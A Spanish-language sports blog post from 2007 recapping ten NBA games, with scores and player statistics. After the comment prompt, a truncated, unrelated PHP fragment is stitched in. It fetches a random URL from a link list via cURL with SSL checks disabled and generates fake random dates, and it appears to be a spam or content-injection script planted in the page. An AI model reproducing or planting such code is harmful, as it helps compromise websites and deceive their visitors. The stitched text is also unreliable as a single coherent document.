La crónica (17/11/07)

18 de November de 2007 por Charlyjauskas

Noche intensa de partidos. En total 10 partidos dónde hubo pocas sorpresas. Únicamente la victoria de los Pacers sobre Jazz y tal vez el partido reñido de los Dallas ante los Grizzlies. Wade continúa cogiendo la forma y aún que con horrible % de tiro ya hace ganar a su equipo con ayuda del mítico Penny Hardaway. Destacar la gran victoria de unos Wizards sin Arenas antes unos Trail Blazers que venían enrachados, al igual que una nueva derrota de los esperanzadores Hawks antes los Bucks que empiezan a dar muestras de su verdadero potencial. Como no, destacar también la primera titularidad de Juan Carlos NBArro que tuvo 2 bolas de partido que desaprovechó, aunque sigue siendo de gran mérito lo realizado en sus 2 últimas noches. Grandísima noticia para el baloncesto español!!! Asi que nada vamos a empezar a comentar la jornada la jornada y sus diversos protagonistas.

Trail Blazers 90 – 109 Wizards (Continua la racha incluso sin Arenas….)

Con la lesión en la rodilla nada grave del agente cero Arenas, todo se ponía cuesta arriba para los de Eddie Jordan, en su lugar entró Antonio Daniels pero cumplió con un “doble doble” 10 puntos 10 asistencias y 5 rebotes. Mejor todavía lo hizo Jamison ayudando a su equipo a conseguir la cuarta victoria consecutiva y cuarta de la temporada con 30 y 11 rebotes puntos, recordemos que empezaron 0-5 la campaña. En la pintura el claro dominador fue Haywood con 17 puntos y 10 rebotes. Esta vez Butler estuvo más flojo pero el equipo no lo resintió y la nota feliz la puso el rookie Nick Young con 17 puntos en 14 minutos. Un 11-2 en el primer cuarto ya hizo bastante para que los Blazers fueran a remolque todo el encuentro quer tuvieron en LaMarcus Aldridge en su mejor hombre con 18 puntos y 10 rebotes. Jack desde el banco tambien hizo 18.

Seattle SuperSonics 84 – 100 Charlotte Bobcats(Y los linces pararon a los Sonics…)

Después de la victoria in extremis de ayer y su racha de 2 victorias seguidas, vuelta a la realidad para los Supersonics. El cansancio hizo mella en los jugadores de Seattle y fueron barridos fácilmente por unos sólidos Bobcats donde destacaron los 27 puntos de Gerald Wallace y los 23 de Jason Richardson (14 de ellos en el tercer cuarto). Aunque los Sonics llegaron a ir por delante al principio de la 2ª mitad, J-Rich cogió su fusil y, junto al cansancio acumulado del partido anterior por los visitantes, rompió el partido y lo convirtió en un camino de rosas para los linces. Además de J-Rich y Wallace destacaron por los Charlotte los 13 puntos, 12 asistencias y 7 rebotes de Felton y los 12 puntos y 15 rebotes de Okafor. Por parte visitante el jugador referencia fue Wilcox con 24 puntos y 9 rebotes junto a Wilkins 19 puntos y 7 rebotes, demostrando que sigue en forma. El, de momento, ROY Durant se quedo en 16 ptos con un discreto 3-12, mientras Green sigue demostrando su valía y aportando en las oportunidades que le va dando Carlesimo.

Utah Jazz 97-117 Indiana Pacers( ésta vez no se dejaron remontar los Pacers…)

El que se puede considerar partido sorpresa de la jornada. Los Pacers ganaron con cierta facilidad a unos Jazz irreconocibles dónde sólo carburó el de siempre,es decir, Carlitos Boozer con 19 puntos aunque sorprende que sólo 4 rebotes. Indiana se está mostrando como uno de los equipos que practican un juego más alegre y vistoso de la NBA, aunque con una tremenda irregularidad. Ya han sido varios los partidos dónde bordan una tremenda 1ª parte y lo echan a perder en una deplorable 2ª mitad de partido. Por suerte para ellos eso no ha ocurrido ésta noche. Terminaron la 1ª mitad con una cómoda ventaja de 19 puntos que fueron administrando e incluso ampliando al final del partido. Murphy entró de titular en Indiana. El 11-23 en tiros de tres puntos habla de la buena puntería que demostraron ayer los de O’Brien. Destacaron por parte local Dunleavy con 25 puntos, los 19 puntos de Granger,8 puntos y 13asistencias de Tinsley y, desde el banco, los 16 puntos y 8 rebotes de Shawne Williams y los 17 de Marquis Daniels fallando un único tiro en 15 minutos. Por parte visitante destacar al antes mencionado Boozer, al ruso AK-47 con 12 puntos, 4 asistencias y 5 tapones mostrando una vez más que se trata del mejor all-round player de la NBA. El otro líder del equipo, Deron, se quedó con unos discretos 8 puntos y 6 asistencias, aunque acompañándolos de 6 pérdidas.

Miami Heat 91-87 New Jersey Nets(Levantando el vuelo por Florida… )

Pues sí señor…Wade ha vuelto: 23 puntos, 6 rebotes y 9 asistencias. Aunque sigue cogiendo forma, Flash realiza su primer partido en condiciones y lleva a la victoria a su equipo con ayuda de un viejo rockero como es Penny Hardaway (16 puntos sin fallo, 4-4 de en triples) y el incombustible Shaq (18 puntos y 5 rebotes). Así que parece que estos Miami, con su estrella de vuelta, no pintan tan mal como se estaba viendo en éste horrible comienzo de temporada. El problema de los Nets estuvo en su cantidad de pérdidas, 26 en total. De todas maneras tuvieron oportunidad de empatar el partido a falta de pocos segundos en una jugada que falló Jefferson. Wade terminó de finiquitar el partido. Por parte visitante 5 jugadores terminaron en dobles dígitos, 3 de ellos desde el banquillo (Penny, Cook con 10 puntos y Zo con otros 10 puntos y 5 rebotes). Por parte local destacaron el rookie Sean Williams con 22 puntos y 8 rebotes, y el base Jason Kidd rozando nuevamente el triple doble con 16 puntos, 8 rebotes y 15 asistencias. Antoine Wright por fín realizó un partido serio sustituyendo a Carter terminando con 14 puntos, 6 rebotes y 6 asistencias. Jefferson terminó con 18 puntos a pesar de sus malos porcentajes de tiro.

N.O Hornets 100-82 Minnesota TimberWolves(Los Hornets suma y sigue….)

A pesar de la lesión de Paul, victoria fácil de los Hornets en Minneapolis. Aunque la ruptura se hizo esperar hasta el final del tercer cuarto donde consiguieron un parcial de 20-7 que junto a las sólo 4 pérdidas (récord del equipo) cimentaron la victoria del equipo. Éstos Hornets van en serio por lo que parece, y ya se colocan con un registro de 9-2. Ayer todos sus titulares pasaron de los dobles dígitos en anotación con buenos porcentajes. Destacan Pedja con 22 puntos, Peterson con 18 y Pargo con 15 puntos y 7 asistencias. Respecto a los TimberWolves poco que comentar. En su año de transición destaca el de casi siempre, Al Jefferson con 20-10 y Telfair con 15 puntos. Hoy destacó la titularidad de Antoine “Sandías” Walker que venía realizando grandes partidos saliendo desde el banquillo (hoy se quedó en 10 puntos y 7 rebotes). Claros candidatos al primer puesto de Draft sin ninguna duda.

Atlanta Hawks 96-105 Milwaukee Bucks(La jueventud no termina de arrancar…)

Partido disputado el vivido en Milwaukee. El joven Josh Smith, 38 puntos y 7 rebotes, no fue suficiente para derrotar a unos sólidos Bucks comandados por sus mejores estiletes, Bogut (21 puntos y 10 rebotes) y Michael Redd (21 puntos). Aunque éste último sorprendió por su increíble defensa sobre Joe Johnson al que dejó en 14 puntos con un 6-16 en tiros. Recordemos que Johnson venía de “enchufarle” 39 puntos a los Sonics, aunque no sirvió de nada por el increíble triple de Kevin Durant. En los Bucks también ayudaron Mo Williams rozando nuevamente el triple doble (11 puntos, 10 asistencias y 8 rebotes) y ,desde el banquillo, ayudó Charlie Villanueva con 17 puntos y 7 rebotes, dando muestra de lo que puede aportar al equipo si las lesiones le respetan. El chino Yi ésta vez pasó desapercibido sin llegar a meter ninguna canasta en juego,sólo desde la línea. Por Atlanta partido discretito de todos. Tal vez Horford, 8 puntos y 8 rebotes, fue lo único destacable. El partido fue bastante igualado,95-96 a falta de 3 min, pero un parcial de 10-2 en esos minutos finales terminaron con las ilusiones de los halconcitos.

Phoenix Suns 115 – 105 Houston Rockets(Scola sigue creciendo…)

El partido estelar del día de la Conferencia Oeste estuvo algo descafeinado por la ausencia por 2º partido consecutivo de T-Mac. Los Suns con su ritmo trepidante fueron cogiendo distancia, hasta que en el 4º cuarto empezaron a guardarse para futuros partidos. Ahí fue donde los Rockets se acercaron y maquillaron el marcador. Por parte de los Suns destacar al quinteto en el que todos estuvieron por encima de los 18 puntos: Nash (19 puntos y 5 asistencias), Barbosa (21 puntos, 5 rebotes y 4 asistencias), Hill (18ptos), Marion (18 puntos y 11 rebotes) y Amare (21 puntos sin fallo en el tiro y 13 rebotes). La baja de Bell hizo que el banquillo no aportara en demasía. Por parte texana Scola fue el jugador más resolutivo de cara al aro con 20 puntos y 11 rebotes dando muestras de su gran clase. El chino Yao tuvo un día para olvidar, y sólo ayudaron al argentino Mike James y Luther Head con 17 y 16 puntos respectivamente.También destacar el debut en la Liga del amigo Francis. Parece que la lesión de T-Mac le ha ayudado a salir de su marginación.

Memphis Grizzlies 103 – 106 Dallas Mavericks (NBArro la tuvo…)

Pues sí, Juan Carlos tuvo la oportunidad de empatar el partido a falta de pocos segundos pero la dichosa bolita no quiso entrar. Una pena para el español ya que en palabras del propio Iavaroni “la jugada estaba pensada para él e intentar sorprender a Dallas”. Los sorprendieron pero NBArro falló. El partido estuvo igualado durante todo el tiempo. Al final del último cuarto un parcial de 10-2 a favor de Dallas parecía finiquitar el partido, pero los Ositos no habían dado su último rugido y les endosaron un parcial de 10-0 de la mano de un tremendo Mike Miller. En ese instante quedaba minuto y medio que se vivió con gran intensidad. Fue una constante ida y vuelta hacia la línea de tiros libres que culminó con el intento fallido de 3 del de Sant Feliú que pudo coronarle después de su mágica noche de ayer. Destacar que debutó como titular ante la ausencia de Milicic. Por parte de los Ositos destacaron los 23 puntos y 7 rebotes de Miller, los 17 puntos y 5 rebotes de Warrick saliendo desde el banco, los 15 puntos y 6 rebotes de nuestro otro español Pau Gasol y los 14 puntos, 4 rebotes y 4 asistencias de NBArro. Por parte texana se echaron el equipo a las espaldas Howard  con 27 puntos y 7 rebotes, el alemán Nowitzki con 21 puntos y 9 rebotes y un tremendo Harris con 19 puntos, 8asistencias y 5 robos.

New York Knicks 83-115 Denver Nuggets(Fácil para Melo&AI3&cía…..)

Partido placentero para los Nuggets que nunca tuvieron rival ante unos NY que van de mal en peor, y demostrando que necesitan un limpieza a fondo del equipo, empezando por el entrenador. Como íba diciendo Denver no tuvo que esforzarse mucho. Con un poquito de Allen Iverson con 23 puntos, otro poquito de Melo con 24 puntos y 6asistencias, y un muchazo de defensa de Marcus Camby con 20 rebotes, 6 asistencias y 5 tapones, bastó. Desde el banquillo destacó el lituano Kleiza con 18 puntos. Por parte neoyorkina destacaron Zach con 16 puntos y 11 rebotes y el incombustible David Lee con 9 puntos y 11 rebotes. Destacar que a Marbury le siguen restando minutos y más minutos, y parece que no terminará bien la temporada por la Gran Manzana.

Chicago Bulls 92-73 Los Angeles Clippers( Los Toritos empiezan a salir a la plaza…)

Parece que después del inicio titubeante que tuvieron los Bulls en éstos 2 últimos partidos dan muestras de despertar. El partido fue bronco. A Nocioni le dieron caña hasta en el carnét de conducir, aunque este, como buen argentino, no se arrugó y terminó con unos tremendos 21 puntos y 8 rebotes, que junto a los 25 puntos de Gordon y la ayuda en defensa de Big Ben con9 puntos, 13 rebotes, 6 robos y 3 tapones desequilibraron rápido el partido hacia el lado de la franquicia taurina. Los Clippers, por pura impotencia, hicieron varias flagrantes sobre la persona de Nocioni sobre todo 2 muy claras de Patterson y Tim Thomas. Los Clippers, ante la falta de sus 2 mayores peligros ofensivos Maggette y Brand, no tuvieron capacidad de reacción. Sólo destacar al de siempre en éste inicio de temporada, el gran Chris Kaman con 21 puntos y 8 rebotes. Tim Thomas le ayudó con 14 puntos y 8 rebotes, pero la nula aportación de los demás hizo inevitable la derrota de los angelinos. Veremos si la versión de los Bulls de las últimas 2 noches se prolonga en el tiempo o sólo ha sido un espejismo.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>